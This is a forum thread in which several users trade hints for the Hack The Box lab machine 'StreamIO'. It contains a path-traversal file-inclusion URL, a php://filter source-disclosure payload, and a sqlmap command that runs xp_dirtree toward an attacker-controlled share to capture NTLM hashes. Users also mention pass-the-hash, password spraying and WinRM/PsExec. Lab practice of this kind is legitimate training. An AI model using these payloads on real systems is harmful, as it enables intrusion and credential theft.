Return to forum
StreamIO - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
BreachForums User
VIP
Posts: 213
Threads: 0
Joined: N/A
Reputation: 56

#11
June 4, 2022 at 10:13 PM
There is an LFI:
https://streamio.htb/admin/?debug=../../../../../../windows/system32/drivers/etc/hosts
(logged in as user yoshihide)
Reply
Member
Member
Posts: 46
Threads: 0
Joined: N/A
Reputation: 3

#12
June 4, 2022 at 10:21 PM
(June 4, 2022, 10:13 PM)Exa Wrote: There is an LFI:
https://streamio.htb/admin/?debug=../../../../../../windows/system32/drivers/etc/hosts
(logged in as user yoshihide)


how did you get debug parameter ?
Reply
BreachForums User
VIP
Posts: 213
Threads: 0
Joined: N/A
Reputation: 56

#13
June 4, 2022 at 10:22 PM
(June 4, 2022, 10:21 PM)dude4695 Wrote:
(June 4, 2022, 10:13 PM)Exa Wrote: There is an LFI:
https://streamio.htb/admin/?debug=../../../../../../windows/system32/drivers/etc/hosts
(logged in as user yoshihide)


how did you get debug parameter ?


Wordlist.

We already had admin/?user=, admin/?staff= and so on.
Reply
Advanced User
Advanced
Posts: 56
Threads: 0
Joined: N/A
Reputation: 1

#14
June 4, 2022 at 10:52 PM
(June 4, 2022, 10:00 PM)ryzen Wrote: I was able to get the users NTLM hash with responder and xp_dirtree, but hascat can't crack it


With the ntlm hash, you should be able to use smbclient with the --pw-nt-hash to pass the hash to WinNT and login. I can't seem to get the hashes in the first place. A nudge would def be appreciated.
Reply
Member
Member
Posts: 40
Threads: 0
Joined: N/A
Reputation: 2

#15
June 4, 2022 at 11:07 PM
(June 4, 2022, 10:52 PM)karhu Wrote:
(June 4, 2022, 10:00 PM)ryzen Wrote: I was able to get the users NTLM hash with responder and xp_dirtree, but hascat can't crack it


With the ntlm hash, you should be able to use smbclient with the --pw-nt-hash to pass the hash to WinNT and login. I can't seem to get the hashes in the first place. A nudge would def be appreciated.


Setup responder locally and run xp_dirtree command via sqlmap(using the login injection) and connect back to my system

sqlmap -r login.req --sql-query="exec master.dbo.xp_dirtree '\\\\ATTACKERIP\\share'"


EDIT: I don't think this is the route. The hash I got is a system account. Unlikely that it will be the way in.
Reply
Member
Member
Posts: 46
Threads: 0
Joined: N/A
Reputation: 3

#16
June 5, 2022 at 5:14 AM
this box is hard didn't find a way to get user shell still struggling
Reply
Member
Member
Posts: 46
Threads: 0
Joined: N/A
Reputation: 3

#17
June 5, 2022 at 8:03 AM
anyone got user shell ?
Reply
BreachForums User
VIP
Posts: 213
Threads: 0
Joined: N/A
Reputation: 56

#18
June 5, 2022 at 8:52 AM
https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php
Reply
Member
Member
Posts: 42
Threads: 0
Joined: N/A
Reputation: 1

#19
June 5, 2022 at 10:07 AM
(June 5, 2022, 08:52 AM)Exa Wrote: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php


So I had found these creds already but I'm stuck on where to use them... I've found out that yoshihide is a valid username in the domain but none of the credentials can be sprayed against this user or the other ones from the DB. Not sure where to move next...
Reply
Advanced User
Advanced
Posts: 51
Threads: 0
Joined: N/A
Reputation: 14

#20
June 5, 2022 at 10:15 AM
(June 5, 2022, 10:07 AM)qwerty173 Wrote:
(June 5, 2022, 08:52 AM)Exa Wrote: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php


So I had found these creds already but I'm stuck on where to use them... I've found out that yoshihide is a valid username in the domain but none of the credentials can be sprayed against this user or the other ones from the DB. Not sure where to move next...

Can we use Winrm or PsExec for these creds?
Reply


 Users viewing this thread: StreamIO - HTB [Discussion]: No users currently viewing.